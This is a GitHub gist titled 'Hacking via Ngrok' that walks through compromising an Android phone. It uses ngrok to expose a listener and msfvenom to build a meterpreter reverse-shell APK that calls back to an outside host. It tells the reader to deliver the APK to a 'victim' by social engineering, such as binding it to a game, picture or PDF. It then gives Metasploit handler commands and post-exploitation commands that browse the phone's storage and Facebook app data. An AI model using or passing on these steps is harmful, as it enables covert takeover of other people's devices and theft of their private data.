Step1: download and configure the ngrok and move it to usr/bin/ in kali linux
Setp2: ngrok tcp 4444 [o/p: Forwarding tcp://2.tcp.ngrok.io:14621 -> localhost:4444 ]
Step3: create payload using msfvenom e.g.
-> msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=14621 R> /var/www/html/payload.apk or if port forwarded
-> msfvenom -p android/meterpreter/reverse_tcp LHOST=router_external_ip(mine:45.121.xxx.xxx) LPORT=forwarded_port_of_router(mine:3000) R> /var/www/html/payload.apk
Note: after generation of the payload you need to send it to the victim via any social engineering delivery method (e.g. binding with game, picture, pdf or via direct link)
Step4: open metasploit console by runing msfconsole
then run the below commands:
-> use exploit/multi/handler
-> set payload android/meterpreter/reverse_tcp
-> show options
-> set LHOST 0.0.0.0 OR 127.0.0.1 (mine kali ip: 192.168.0.153)
-> set LPORT 4444 (mine kali's port: 3000 forwarded by router)
-> show options
-> exploit
----------------
post exploit commands:
->sysinfo
->help
->pwd
->cd /
->ls -l
->cd sdcard
->ls -l
->cd com.facebook.katana
->ls -l
->cd fb_temp
->ls -l
Last active
August 24, 2023 19:48
-
-
Save dasbairagya/3f2ae71d80c35448e1067a68bb8a53c6 to your computer and use it in GitHub Desktop.
Hacking via Ngrok
Author
dasbairagya
commented
Nov 15, 2020
i did every thing and it says session is not valid
and will be closed help pls
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment